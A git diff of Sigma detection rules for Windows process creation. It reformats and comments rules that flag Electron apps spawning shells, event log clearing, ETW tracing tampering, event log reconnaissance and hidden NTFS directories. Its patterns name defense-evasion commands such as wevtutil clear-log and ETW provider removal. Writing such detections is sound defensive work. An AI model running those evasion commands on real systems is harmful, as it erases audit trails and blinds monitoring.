378a05d8-963c-46c9-bcce-13c7657eac99 - type: similar + - id: 378a05d8-963c-46c9-bcce-13c7657eac99 + type: similar status: experimental -description: 'Detects suspicious child processes of electron apps (teams, discord, - slack, etc.). This could be a potential sign of ".asar" file tampering (See reference - section for more information) or binary execution proxy through specific CLI arguments - (see related rule) - - ' +description: | + Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) references: - https://taggart-tech.com/quasar-electron/ - https://github.com/mttaggart/quasar @@ -32,7 +28,9 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: - - \chrome.exe + # Add more electron based app to the list + - \chrome.exe # Might require additional tuning + # - '\code.exe' # Requires additional baseline - \discord.exe - \GitHubDesktop.exe - \keybase.exe @@ -42,7 +40,8 @@ detection: - \slack.exe - \Teams.exe selection_child_image: - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious/unexpected paths - \cmd.exe - \cscript.exe - \mshta.exe @@ -51,48 +50,49 @@ detection: - \regsvr32.exe - \wscript.exe selection_child_paths: - NewProcessName|contains: + NewProcessName|contains: + # Add more suspicious/unexpected paths - \AppData\Local\Temp\ - \Users\Public\ - \Windows\Temp\ - :\Temp\ filter_main_chrome: ParentProcessName|endswith: \chrome.exe - NewProcessName|endswith: \chrome.exe + NewProcessName|endswith: \chrome.exe filter_main_discord: ParentProcessName|endswith: \discord.exe - NewProcessName|endswith: \discord.exe + NewProcessName|endswith: \discord.exe filter_main_githubdesktop: ParentProcessName|endswith: \GitHubDesktop.exe - NewProcessName|endswith: \GitHubDesktop.exe + NewProcessName|endswith: \GitHubDesktop.exe filter_main_keybase: ParentProcessName|endswith: \keybase.exe - NewProcessName|endswith: \keybase.exe + NewProcessName|endswith: \keybase.exe filter_main_msedge: ParentProcessName|endswith: \msedge.exe - NewProcessName|endswith: \msedge.exe + NewProcessName|endswith: \msedge.exe filter_main_msedgewebview: ParentProcessName|endswith: \msedgewebview2.exe - NewProcessName|endswith: \msedgewebview2.exe + NewProcessName|endswith: \msedgewebview2.exe filter_main_msteams: ParentProcessName|endswith: \msteams.exe - NewProcessName|endswith: \msteams.exe + NewProcessName|endswith: \msteams.exe filter_main_slack: ParentProcessName|endswith: \slack.exe - NewProcessName|endswith: \slack.exe + NewProcessName|endswith: \slack.exe filter_main_teams: ParentProcessName|endswith: \teams.exe - NewProcessName|endswith: \teams.exe + NewProcessName|endswith: \teams.exe filter_main_werfault: - NewProcessName: + NewProcessName: - C:\Windows\SysWOW64\WerFault.exe - C:\Windows\System32\WerFault.exe filter_optional_discord: - CommandLine|contains: \NVSMI\nvidia-smi.exe + CommandLine|contains: \NVSMI\nvidia-smi.exe ParentProcessName|endswith: \Discord.exe - condition: process_creation and (selection_parent and 1 of selection_child_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_parent and 1 of selection_child_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate child processes can occur in cases of debugging +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml b/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml index d1921ba44..465c1b6ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml @@ -1,12 +1,10 @@ title: Potentially Suspicious Electron Application CommandLine id: 378a05d8-963c-46c9-bcce-13c7657eac99 related: - - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 - type: similar + - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 + type: similar status: experimental -description: Detects potentially suspicious CommandLine of electron apps (teams, discord, - slack, etc.). This could be a sign of abuse to proxy execution through a signed - binary. +description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. references: - https://positive.security/blog/ms-officecmd-rce - https://lolbas-project.github.io/lolbas/Binaries/Teams/ @@ -27,32 +25,34 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \chrome.exe - - \code.exe - - \discord.exe - - \GitHubDesktop.exe - - \keybase.exe - - \msedge_proxy.exe - - \msedge.exe - - \msedgewebview2.exe - - \msteams.exe - - \slack.exe - - \Teams.exe - - OriginalFileName: - - chrome.exe - - code.exe - - discord.exe - - GitHubDesktop.exe - - keybase.exe - - msedge_proxy.exe - - msedge.exe - - msedgewebview2.exe - - msteams.exe - - slack.exe - - Teams.exe + - NewProcessName|endswith: + # Add more electron based app to the list + - \chrome.exe + - \code.exe + - \discord.exe + - \GitHubDesktop.exe + - \keybase.exe + - \msedge_proxy.exe + - \msedge.exe + - \msedgewebview2.exe + - \msteams.exe + - \slack.exe + - \Teams.exe + - OriginalFileName: + # Add more electron based app to the list + - chrome.exe + - code.exe + - discord.exe + - GitHubDesktop.exe + - keybase.exe + - msedge_proxy.exe + - msedge.exe + - msedgewebview2.exe + - msteams.exe + - slack.exe + - Teams.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --browser-subprocess-path - --gpu-launcher - --renderer-cmd-prefix @@ -60,5 +60,6 @@ detection: condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage for debugging purposes +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml index d570a5b86..c3e51d27f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml @@ -1,11 +1,10 @@ title: Elevated System Shell Spawned From Uncommon Parent Location id: 178e615d-e666-498b-9630-9ed363038101 related: - - id: 61065c72-5d7d-44ef-bf41-6a36684b545f - type: similar + - id: 61065c72-5d7d-44ef-bf41-6a36684b545f + type: similar status: experimental -description: Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges from a uncommon parent location. +description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location. references: - https://github.com/Wh04m1001/SysmonEoP author: frack113, Tim Shelton (update fp) @@ -24,43 +23,50 @@ detection: EventID: 4688 Channel: Security selection_shell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI SubjectLogonId: '0x3e7' filter_main_generic: + # Example 1: + # C:\Program Files\erl-23.2\erts-11.1.4\bin\erl.exe" -service_event ErlSrv_RabbitMQ -nohup -sname rabbit@localhost -s rabbit boot -boot start_sasl +W w +MBas ageffcbf +MHas ageffcbf +MBlmbcs 512 +MHlmbcs 512 +MMmcs 30 +P 1048576 +t 5000000 +stbt db +zdbbl 128000 +sbwt none +sbwtdcpu none +sbwtdio none -kernel inet_dist_listen_min 25672 -kernel inet_dist_listen_max 25672 -lager crash_log false -lager handlers [] + # Example 2: + # ParentImage: C:\Program Files (x86)\Varonis\DatAdvantage\GridCollector\VrnsRealTimeAlertsSvc.exe" /appid 000000ad-cb03-500b-9459-c46d000000ad + # CommandLine: C:\Windows\system32\cmd.exe /c C:\Program Files "(x86)\Varonis\DatAdvantage\GridCollector\handle_scopes.cmd C:\Collector" Working Share\VaronisWorkDirectoryCollector ParentProcessName|contains: - :\Program Files (x86)\ - :\Program Files\ - :\ProgramData\ - :\Windows\System32\ - :\Windows\SysWOW64\ - - :\Windows\Temp\ + - :\Windows\Temp\ # Installers - :\Windows\WinSxS\ filter_optional_manageengine: + # Example: + # ParentImage: C:/ManageEngine/ADManager Plus/pgsql/bin/postgres.exe" --forkarch 5380 + # CommandLine: C:\Windows\system32\cmd.exe /c "IF EXIST archive.bat (archive.bat pg_wal\000000010000008E000000EA 000000010000008E000000EA) ParentProcessName|endswith: :\ManageEngine\ADManager Plus\pgsql\bin\postgres.exe - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_optional_asgard: - CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " + CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " CurrentDirectory|contains: :\WINDOWS\Temp\asgard2-agent\ filter_optional_ibm_spectrumprotect: - CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ + CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ ParentProcessName|contains: :\IBM\SpectrumProtect\webserver\scripts\ filter_main_parent_null: - ParentProcessName: null + ParentProcessName: filter_main_parent_empty: ParentProcessName: '' - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml b/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml index f6778aebc..c6323eec1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_embed_exe_lnk.yml @@ -1,8 +1,7 @@ title: Hidden Powershell in Link File Pattern id: 30e92f50-bb5a-4884-98b5-d20aa80f3d7a status: test -description: Detects events that appear when a user click on a link file with a powershell - command in it +description: Detects events that appear when a user click on a link file with a powershell command in it references: - https://www.x86matthew.com/view_post?id=embed_exe_lnk author: frack113 @@ -18,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - .lnk ParentProcessName: C:\Windows\explorer.exe - NewProcessName: C:\Windows\System32\cmd.exe + NewProcessName: C:\Windows\System32\cmd.exe condition: process_creation and selection falsepositives: - Legitimate commands in .lnk files diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml b/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml index 6642db7b6..d6b4a9c93 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml @@ -1,9 +1,7 @@ title: ETW Logging Tamper In .NET Processes id: 41421f44-58f9-455d-838a-c398859841d4 status: test -description: Detects changes to environment variables related to ETW logging. This - could indicate potential adversaries stopping ETW providers recording loaded .NET - assemblies. +description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. references: - https://twitter.com/_xpn_/status/1268712093928378368 - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr @@ -29,7 +27,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - COMPlus_ETWEnabled - COMPlus_ETWFlags condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml index fbdb47642..25037df22 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_etw_trace_evasion.yml @@ -1,8 +1,7 @@ title: Disable of ETW Trace id: a238b5d0-ce2d-4414-a676-7a531b3d13d6 status: test -description: Detects a command that clears or disables any ETW trace log which could - indicate a logging evasion. +description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil - https://abuse.io/lockergoga.txt @@ -23,32 +22,32 @@ detection: EventID: 4688 Channel: Security selection_clear_1: - CommandLine|contains|all: + CommandLine|contains|all: - cl - /Trace selection_clear_2: - CommandLine|contains|all: + CommandLine|contains|all: - clear-log - /Trace selection_disable_1: - CommandLine|contains|all: + CommandLine|contains|all: - sl - /e:false selection_disable_2: - CommandLine|contains|all: + CommandLine|contains|all: - set-log - /e:false - selection_disable_3: - CommandLine|contains|all: + selection_disable_3: # ETW provider removal from a trace session + CommandLine|contains|all: - logman - update - trace - --p - -ets - selection_pwsh_remove: - CommandLine|contains: Remove-EtwTraceProvider - selection_pwsh_set: - CommandLine|contains|all: + selection_pwsh_remove: # Autologger provider removal + CommandLine|contains: Remove-EtwTraceProvider + selection_pwsh_set: # Provider “Enable” property modification + CommandLine|contains|all: - Set-EtwTraceProvider - '0x11' condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml index 17141ed2b..3e3727790 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -1,9 +1,7 @@ title: Suspicious Eventlog Clear or Configuration Change id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 status: stable -description: Detects clearing or configuration of eventlogs using wevtutil, powershell - and wmic. Might be used by ransomwares during the attack (seen by NotPetya and - others). +description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html @@ -26,30 +24,33 @@ detection: EventID: 4688 Channel: Security selection_wevtutil: - CommandLine|contains: - - 'clear-log ' - - ' cl ' - - 'set-log ' - - ' sl ' - - 'lfn:' - NewProcessName|endswith: \wevtutil.exe + CommandLine|contains: + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' + - 'lfn:' # change log file location and name + NewProcessName|endswith: \wevtutil.exe selection_other_ps: - CommandLine|contains: + CommandLine|contains: - 'Clear-EventLog ' - 'Remove-EventLog ' - 'Limit-EventLog ' - 'Clear-WinEvent ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_other_wmi: - CommandLine|contains: ClearEventLog - NewProcessName|endswith: + CommandLine|contains: ClearEventLog + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \wmic.exe filter_msiexec: - CommandLine|contains: ' sl ' + # Example seen during office update/installation: + # ParentImage: C:\Windows\SysWOW64\msiexec.exe + # CommandLine: "C:\WINDOWS\system32\wevtutil.exe" sl Microsoft-RMS-MSIPC/Debug /q:true /e:true /l:4 /rt:false + CommandLine|contains: ' sl ' ParentProcessName: - C:\Windows\SysWOW64\msiexec.exe - C:\Windows\System32\msiexec.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml index cb198b6a3..ec73e6272 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_eventlog_content_recon.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf related: - - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f - type: derived + - id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f + type: derived status: experimental -description: 'Detects execution of different log query utilities and commands to search - and dump the content of specific event logs or look for specific event IDs. - - This technique is used by threat actors in order to extract sensitive information - from events logs such as usernames, IP addresses, hostnames, etc. - - ' +description: | + Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. + This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ @@ -36,46 +32,52 @@ detection: EventID: 4688 Channel: Security selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - NewProcessName|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - NewProcessName|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' selection_logs_name: - CommandLine|contains: + CommandLine|contains: + # Note: Add more event log channels that are interesting for attackers - Microsoft-Windows-TerminalServices-LocalSessionManager/Operational - Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational - Security selection_logs_eid: - CommandLine|contains: + CommandLine|contains: + # Note: We use the "?" to account for both a single and a double quote + # Note: Please add additional interesting event IDs + # Note: As this only focuses on EIDs and we know EIDs are not unique across providers. Rare FPs might occur with legit queries to EIDs from different providers. + # This covers EID 4624 from Security Log - -InstanceId 4624 - System[EventID=4624] - EventCode=?4624? - EventIdentifier=?4624? + # This covers EID 4778 from Security Log - -InstanceId 4778 - System[EventID=4778] - EventCode=?4778? - EventIdentifier=?4778? + # This covers EID 25 from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log - -InstanceId 25 - System[EventID=25] - EventCode=?25? - EventIdentifier=?25? - condition: process_creation and (1 of selection_logs_* and (selection_wmi or all - of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) + condition: process_creation and (1 of selection_logs_* and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet)) falsepositives: - Legitimate usage of the utility by administrators to query the event log level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml index be13cd89b..d4dc13b98 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml @@ -1,8 +1,7 @@ title: Suspicious Execution From GUID Like Folder Names id: 90b63c33-2b97-4631-a011-ceb0f47b77c3 status: test -description: Detects potential suspicious execution of a GUID like folder name located - in a suspicious location such as %TEMP% as seen being used in IcedID attacks +description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks references: - https://twitter.com/Kostastsale/status/1565257924204986369 author: Nasreddine Bencherchali (Nextron Systems) @@ -15,28 +14,32 @@ logsource: category: process_creation product: windows detection: + # Uncomment this section and remove the filter if you want the rule to be more specific to processes + # selection_img: + # Image|endswith: + # - '\rundll32.exe' process_creation: EventID: 4688 Channel: Security selection_folder: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious or unexpected paths - \AppData\Roaming\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # This could generate some FP with some installers creating folders with GUID selection_guid: - CommandLine|contains|all: + CommandLine|contains|all: - \{ - '}\' filter: - NewProcessName|contains|all: + NewProcessName|contains|all: - \{ - '}\' filter_null: - NewProcessName: null - filter_driver_inst: - NewProcessName: C:\Windows\System32\drvinst.exe + NewProcessName: + filter_driver_inst: # DrvInst.exe "4" "0" "C:\Users\venom\AppData\Local\Temp\{a0753cc2-fcea-4d49-a787-2290b564b06f}\nvvhci.inf" "9" "43a2fa8e7" "00000000000001C0" "WinSta0\Default" "00000000000001C4" "208" "c:\program files\nvidia corporation\installer2\nvvhci.{eb7b4460-7ec9-42d6-b73f-d487d4550526}" + NewProcessName: C:\Windows\System32\drvinst.exe condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - - Installers are sometimes known for creating temporary folders with GUID like - names. Add appropriate filters accordingly + - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml index c30a29d94..29e272d7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml @@ -1,8 +1,7 @@ title: Parent in Public Folder Suspicious Process id: 69bd9b97-2be2-41b6-9816-fb08757a4d1a status: test -description: This rule detects suspicious processes with parent images located in - the C:\Users\Public folder +description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - powershell - 'cmd.exe /c ' - 'cmd.exe /r ' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml index 412ac8e35..8433396ec 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path.yml @@ -21,31 +21,31 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|contains: - - \$Recycle.bin\ - - \config\systemprofile\ - - \Intel\Logs\ - - \RSA\MachineKeys\ - - \Users\All Users\ - - \Users\Default\ - - \Users\NetworkService\ - - \Users\Public\ - - \Windows\addins\ - - \Windows\debug\ - - \Windows\Fonts\ - - \Windows\Help\ - - \Windows\IME\ - - \Windows\Media\ - - \Windows\repair\ - - \Windows\security\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - NewProcessName|startswith: C:\Perflogs\ + - NewProcessName|contains: + - \$Recycle.bin\ + - \config\systemprofile\ + - \Intel\Logs\ + - \RSA\MachineKeys\ + - \Users\All Users\ + - \Users\Default\ + - \Users\NetworkService\ + - \Users\Public\ + - \Windows\addins\ + - \Windows\debug\ + - \Windows\Fonts\ + - \Windows\Help\ + - \Windows\IME\ + - \Windows\Media\ + - \Windows\repair\ + - \Windows\security\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - NewProcessName|startswith: C:\Perflogs\ filter_ibm: - NewProcessName|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\ + NewProcessName|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\ filter_citrix: - NewProcessName|startswith: C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\ - NewProcessName|endswith: \CitrixReceiverUpdater.exe + NewProcessName|startswith: C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\ + NewProcessName|endswith: \CitrixReceiverUpdater.exe condition: process_creation and (selection and not 1 of filter_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml index a3ac56bbd..aa6112192 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_execution_path_webserver.yml @@ -1,8 +1,7 @@ title: Execution in Webserver Root Folder id: 35efb964-e6a5-47ad-bbcd-19661854018d status: test -description: Detects a suspicious program execution in a web service root folder (filter - out false positives) +description: Detects a suspicious program execution in a web service root folder (filter out false positives) author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2021/11/27 @@ -17,12 +16,12 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - \wwwroot\ - \wmpub\ - \htdocs\ filter: - NewProcessName|contains: + NewProcessName|contains: - bin\ - \Tools\ - \SMSComponent\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml b/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml index dabc3ed7b..ee726a592 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_gather_network_info_execution.yml @@ -1,13 +1,12 @@ title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS id: 07aa184a-870d-413d-893a-157f317f6f58 related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 575dce0c-8139-4e30-9295-1ee75969f7fe - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government @@ -26,9 +25,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs filter: - NewProcessName|endswith: + NewProcessName|endswith: - \cscript.exe - \wscript.exe condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml b/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml index 0978cb883..1b1a35402 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml @@ -1,14 +1,11 @@ title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI id: 0900463c-b33b-49a8-be1d-552a3b553dae related: - - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 - type: similar + - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 + type: similar status: experimental -description: 'Detects command line containing reference to the "::$index_allocation" - stream, which can be used as a technique to prevent access to folders or files - from tooling such as "explorer.exe" or "powershell.exe" - - ' +description: | + Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" references: - https://twitter.com/pfiatde/status/1681977680688738305 - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/ @@ -28,7 +25,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ::$index_allocation + # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage + CommandLine|contains: ::$index_allocation condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml b/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml index 61b7387b0..f834603c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml @@ -1,9 +1,7 @@ title: Writing Of Malicious Files To The Fonts Folder id: ae9b0bd7-8888-4606-b444-0ed7410cb728 status: test -description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ - location. This folder doesn't require admin privillege to be written and executed - from. +description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. references: - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ author: Sreeman @@ -22,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - echo - copy - type - file createnew - cacls selection_2: - CommandLine|contains: C:\Windows\Fonts\ + CommandLine|contains: C:\Windows\Fonts\ selection_3: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml b/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml index e351d4848..1a2605be0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml @@ -1,16 +1,10 @@ title: Potential Homoglyph Attack Using Lookalike Characters id: 32e280f1-8ad4-46ef-9e80-910657611fbc status: experimental -description: 'Detects the presence of unicode characters which are homoglyphs, or - identical in appearance, to ASCII letter characters. - - This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs - are included; these are characters that - - are indistinguishable from ASCII characters and thus may make excellent candidates - for homoglyph attack characters. - - ' +description: | + Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. + This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that + are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. references: - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish - http://www.irongeek.com/homoglyph-attack-generator.php @@ -20,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1036 - attack.t1036.003 + # - 